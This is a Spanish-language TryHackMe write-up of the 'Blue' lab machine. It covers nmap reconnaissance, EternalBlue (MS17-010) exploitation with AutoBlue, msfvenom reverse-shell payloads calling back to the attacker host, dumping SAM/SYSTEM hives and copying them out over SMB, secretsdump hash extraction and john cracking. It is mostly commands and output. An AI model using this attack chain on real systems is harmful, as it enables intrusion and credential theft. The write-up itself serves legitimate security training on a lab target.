Try Hack Me Blue

Posted Jun 17, 2023 Updated Jun 17, 2023

By K4miyo Touma 12 min read

Máquina Blue

Se procede con la fase de reconocimiento lanzando primeramente un ping a la dirección IP 10.10.43.82.

  
❯ ping -c 1 10.10.43.82
PING 10.10.43.82 (10.10.43.82) 56(84) bytes of data.
64 bytes from 10.10.43.82: icmp_seq=1 ttl=127 time=153 ms

--- 10.10.43.82 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 152.809/152.809/152.809/0.000 ms

De acuerdo con el TTL de traza ICMP, se puede determinar que se trata de una máquina con sistema operativo Windows. A continuación se procede con la ejecución de nmap para determinar los puertos abiertos de la máquina y exportanto la información al archivo allPorts.

  
❯ nmap -p- --open -sS --min-rate 5000 -vvv -Pn 10.10.43.82 -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-17 16:08 CST
Initiating Parallel DNS resolution of 1 host. at 16:08
Completed Parallel DNS resolution of 1 host. at 16:08, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:08
Scanning 10.10.43.82 [65535 ports]
Discovered open port 445/tcp on 10.10.43.82
Discovered open port 135/tcp on 10.10.43.82
Discovered open port 139/tcp on 10.10.43.82
Discovered open port 3389/tcp on 10.10.43.82
Discovered open port 49159/tcp on 10.10.43.82
Discovered open port 49152/tcp on 10.10.43.82
Discovered open port 49153/tcp on 10.10.43.82
Discovered open port 49158/tcp on 10.10.43.82
Discovered open port 49154/tcp on 10.10.43.82
Completed SYN Stealth Scan at 16:09, 15.12s elapsed (65535 total ports)
Nmap scan report for 10.10.43.82
Host is up, received user-set (0.15s latency).
Scanned at 2023-06-17 16:08:46 CST for 15s
Not shown: 65268 closed tcp ports (reset), 258 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       REASON
135/tcp   open  msrpc         syn-ack ttl 127
139/tcp   open  netbios-ssn   syn-ack ttl 127
445/tcp   open  microsoft-ds  syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127
49152/tcp open  unknown       syn-ack ttl 127
49153/tcp open  unknown       syn-ack ttl 127
49154/tcp open  unknown       syn-ack ttl 127
49158/tcp open  unknown       syn-ack ttl 127
49159/tcp open  unknown       syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.26 seconds
           Raw packets sent: 74133 (3.262MB) | Rcvd: 67257 (2.690MB)

Mediante la función extractPorts definida a nivel de zsh , se obtiene la información más relevante de la captura grepeable.

  
❯ extractPorts allPorts
───────┬────────────────────────────────────────────────────────────────────
       │ File: extractPorts.tmp
───────┼────────────────────────────────────────────────────────────────────
   1   │ 
   2   │ [*] Extracting information...
   3   │ 
   4   │     [*] IP Address: 10.10.43.82
   5   │     [*] Open ports: 135,139,445,3389,49152,49153,49154,49158,49159
   6   │ 
   7   │ [*] Ports copied to clipboard

A continuación se lanza una serie de scripts para determinar el servicio y versión que corren para los puertos detectados.

  
❯ nmap -sCV -p135,139,445,3389,49152,49153,49154,49158,49159 10.10.43.82 -oN targeted
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-17 16:10 CST
Nmap scan report for 10.10.43.82
Host is up (0.15s latency).

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
| ssl-cert: Subject: commonName=Jon-PC
| Not valid before: 2023-06-16T22:07:01
|_Not valid after:  2023-12-16T22:07:01
|_ssl-date: 2023-06-17T22:11:44+00:00; -5s from scanner time.
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-06-17T22:11:30
|_  start_date: 2023-06-17T22:06:59
|_clock-skew: mean: 1h14m55s, deviation: 2h30m00s, median: -5s
| smb2-security-mode: 
|   210: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02f713c77a41 (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-06-17T17:11:29-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.09 seconds

Observamos que se tiene el puerto 445 abierto y se trata de una máquina Windows con sistema operativo Windows 7 Professional, por lo que podríamos validar si es vulnerable al Eternal Blue.

  
❯ nmap --script smb-vuln-ms17-010 -p445 10.10.43.82 -oN smb-vuln-ms17-010
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-17 16:17 CST
Nmap scan report for 10.10.43.82
Host is up (0.16s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 2.10 seconds

Vemos que si pude ser vulnerable, por lo que vamos a descargar el exploit AutoBlue-MS17-010:

  
❯ git clone https://github.com/3ndG4me/AutoBlue-MS17-010
Cloning into 'AutoBlue-MS17-010'...
remote: Enumerating objects: 136, done.
remote: Counting objects: 100% (60/60), done.
remote: Compressing objects: 100% (24/24), done.
remote: Total 136 (delta 46), reused 36 (delta 36), pack-reused 76
Receiving objects: 100% (136/136), 101.12 KiB | 790.00 KiB/s, done.
Resolving deltas: 100% (80/80), done.

Generamos la reverse shell para ingresar a la máquina:

  
❯ cd AutoBlue-MS17-010
❯ ll
drwxr-xr-x root root 192 B  Sat Jun 17 16:21:48 2023  shellcode
.rw-r--r-- root root 2.7 KB Sat Jun 17 16:21:48 2023  eternal_checker.py
.rw-r--r-- root root  26 KB Sat Jun 17 16:21:48 2023  eternalblue_exploit10.py
.rw-r--r-- root root  25 KB Sat Jun 17 16:21:48 2023  eternalblue_exploit7.py
.rw-r--r-- root root  24 KB Sat Jun 17 16:21:48 2023  eternalblue_exploit8.py
.rw-r--r-- root root 1.0 KB Sat Jun 17 16:21:48 2023  LICENSE
.rwxr-xr-x root root 3.8 KB Sat Jun 17 16:21:48 2023  listener_prep.sh
.rw-r--r-- root root  25 KB Sat Jun 17 16:21:48 2023  mysmb.py
.rw-r--r-- root root 5.2 KB Sat Jun 17 16:21:48 2023  README.md
.rw-r--r-- root root   8 B  Sat Jun 17 16:21:48 2023  requirements.txt
.rw-r--r-- root root  48 KB Sat Jun 17 16:21:48 2023  zzz_exploit.py
❯ cd shellcode
❯ ll
.rw-r--r-- root root  20 KB Sat Jun 17 16:21:48 2023  eternalblue_kshellcode_x64.asm
.rw-r--r-- root root  19 KB Sat Jun 17 16:21:48 2023  eternalblue_kshellcode_x86.asm
.rw-r--r-- root root 1.6 KB Sat Jun 17 16:21:48 2023  eternalblue_sc_merge.py
.rwxr-xr-x root root 4.5 KB Sat Jun 17 16:21:48 2023  shell_prep.sh
❯ ./shell_prep.sh
                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|   
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
10.9.85.95
LPORT you want x64 to listen on:
443
LPORT you want x86 to listen on:
8443
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...

msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.9.85.95 LPORT=443
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (stageless)...

msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.9.85.95 LPORT=8443
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE

❯ ll
.rw-r--r-- root root  20 KB Sat Jun 17 16:21:48 2023  eternalblue_kshellcode_x64.asm
.rw-r--r-- root root  19 KB Sat Jun 17 16:21:48 2023  eternalblue_kshellcode_x86.asm
.rw-r--r-- root root 1.6 KB Sat Jun 17 16:21:48 2023  eternalblue_sc_merge.py
.rw-r--r-- root root 2.2 KB Sat Jun 17 16:23:29 2023  sc_all.bin
.rw-r--r-- root root 1.2 KB Sat Jun 17 16:23:29 2023  sc_x64.bin
.rw-r--r-- root root 772 B  Sat Jun 17 16:22:34 2023  sc_x64_kernel.bin
.rw-r--r-- root root 460 B  Sat Jun 17 16:23:21 2023  sc_x64_msf.bin
.rw-r--r-- root root 962 B  Sat Jun 17 16:23:29 2023  sc_x86.bin
.rw-r--r-- root root 638 B  Sat Jun 17 16:22:34 2023  sc_x86_kernel.bin
.rw-r--r-- root root 324 B  Sat Jun 17 16:23:29 2023  sc_x86_msf.bin
.rwxr-xr-x root root 4.5 KB Sat Jun 17 16:21:48 2023  shell_prep.sh

Nos ponemos en escucha por el puerto 443 y ejecutar el exploit, a veces es necesario ejecutar el exploit varias veces:

❯ python3 eternalblue_exploit7.py 10.10.43.82 shellcode/sc_x64.bin
shellcode size: 1232
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
❯ python3 eternalblue_exploit7.py 10.10.43.82 shellcode/sc_x64.bin
shellcode size: 1232
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

  
❯ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.9.85.95] from (UNKNOWN) [10.10.43.82] 49205
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

Ya nos encontramos dentro de la máquina como el usuario nt authority\system. Para obtener los hashes de los usuario es necesario obtener la SAM y SYSTEM:

  
C:\Windows\system32>cd C:\Users\Public\Dowloads
cd C:\Users\Public\Dowloads

C:\Users\Public\Downloads>reg save HKLM\SAM sam
reg save HKLM\SAM sam
The operation completed successfully.

C:\Users\Public\Downloads>reg save HKLM\SYSTEM system
reg save HKLM\SYSTEM system
The operation completed successfully.

C:\Users\Public\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E611-0B66

 Directory of C:\Users\Public\Downloads

06/17/2023  05:30 PM    <DIR>          .
06/17/2023  05:30 PM    <DIR>          ..
06/17/2023  05:30 PM            24,576 sam
06/17/2023  05:30 PM        12,337,152 system
               2 File(s)     12,361,728 bytes
               2 Dir(s)  20,605,276,160 bytes free

C:\Users\Public\Downloads>

Nos compartirnos los archivos a nuestra máquina de atacante levantando un recurso compartido or smb:

  
❯ impacket-smbserver smbFolder $(pwd) -smb2support
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.43.82,49689)
[*] AUTHENTICATE_MESSAGE (\,JON-PC)
[*] User JON-PC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:smbFolder)

  
C:\Users\Public\Downloads>copy sam \\10.9.85.95\smbFolder\sam
copy sam \\10.9.85.95\smbFolder\sam
        1 file(s) copied.

C:\Users\Public\Downloads>copy system \\10.9.85.95\smbFolder\system
copy system \\10.9.85.95\smbFolder\system
        1 file(s) copied.

C:\Users\Public\Downloads>

❯ ll
.rwxr-xr-x root root 24 KB Sat Jun 17 16:30:41 2023  sam
.rwxr-xr-x root root 12 MB Sat Jun 17 16:30:52 2023  system

Ya tenemos los archivos, ahora con secretsdump obtenemos los hashes de los usuarios:

  
❯ impacket-secretsdump -sam sam -system system local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x55bd17830e678f18a3110daf2c17d4c7
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
[*] Cleaning up...

Se queremos encontrar la contraseña del usuario Jon, procedemos a crackear el hash con john:

  
❯ john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT hashes
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=16
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Administrator)
alqfna22         (Jon)
2g 0:00:00:00 DONE (2023-06-17 16:41) 2.222g/s 11333Kp/s 11333Kc/s 11339KC/s alr19882006..alpusidi
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

Easy, Windows

MS17-010 Enternal Blue

This post is licensed under CC BY 4.0 by the author.

Máquina Blue

Trending Tags